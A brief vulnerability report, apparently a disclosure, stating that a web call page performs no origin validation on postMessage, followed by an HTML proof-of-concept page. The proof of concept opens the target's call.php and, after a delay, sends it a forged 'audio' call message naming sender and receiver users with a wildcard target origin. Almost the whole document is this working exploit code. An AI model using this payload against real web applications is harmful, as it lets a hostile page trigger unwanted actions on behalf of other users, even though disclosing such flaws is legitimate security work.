There is no origin validation for window post messsaging.
```
<html>
<script type="text/javascript">
var call_window;
call_window = window.open("http://localhost/call.php");
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "",
sender_team_name: "zzzz",
receiver_username: "test",
receiver_team_name: "test"
}
}, "*");
}, 1000);
</script>
</html>
```